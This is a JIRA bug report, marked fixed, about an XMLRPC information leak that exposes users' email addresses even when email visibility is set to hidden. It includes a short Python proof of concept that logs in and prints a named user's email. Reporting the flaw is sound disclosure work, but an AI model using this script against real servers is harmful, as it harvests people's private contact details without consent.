Details
-
Bug
-
Resolution: Fixed
-
High
-
3.13.4
-
None
-
CentOS5.3 i386, JDK 1.6.0u16, standalone (in WANdisco JIRA multisite)
-
3.13
-
Description
Server is set in public mode. The configuration option for email is set to hidden.
The XMLRPC interface is enabled for authenticated users.
It is trivial to find a users email.
Concept python code follows:
#!/usr/bin/python
import xmlrpclib
import sys
s = xmlrpclib.ServerProxy('http://myhostname.fqdn/rpc/xmlrpc')
auth = s.jira1.login('username', 'password')
user = s.jira1.getUser(auth, sys.argv[1])
print "Email address of " + sys.argv[1] + " is " + user['email']
